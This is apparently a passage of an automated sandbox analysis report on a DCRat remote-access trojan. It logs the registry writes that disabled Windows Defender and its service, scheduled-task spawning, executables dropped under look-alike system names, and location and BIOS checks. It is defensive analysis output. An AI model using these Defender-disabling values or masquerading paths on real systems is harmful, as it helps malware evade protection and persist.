Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FunCheker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FunCheker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FunCheker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FunCheker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Windows\ja-JP\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\ModifiableWindowsApps\sihost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Java\jre-1.8\winlogon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\MSBuild\winlogon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File opened for modification C:\Program Files (x86)\MSBuild\winlogon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\MSBuild\cc11b995f2a76d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Java\jre-1.8\cc11b995f2a76d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows Security\BrowserCore\en-US\24dbde2999530e C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\088424020bedd6 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ja-JP\msedge.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\it-IT\msedge.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\it-IT\61a52ddc9dd915 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\InputMethod\SHARED\conhost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\InputMethod\SHARED\088424020bedd6 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\ja-JP\msedge.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\ja-JP\61a52ddc9dd915 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\diagnostics\system\IESecurity\msedge.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\Performance\WinSAT\DataStore\38384e6a620884 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
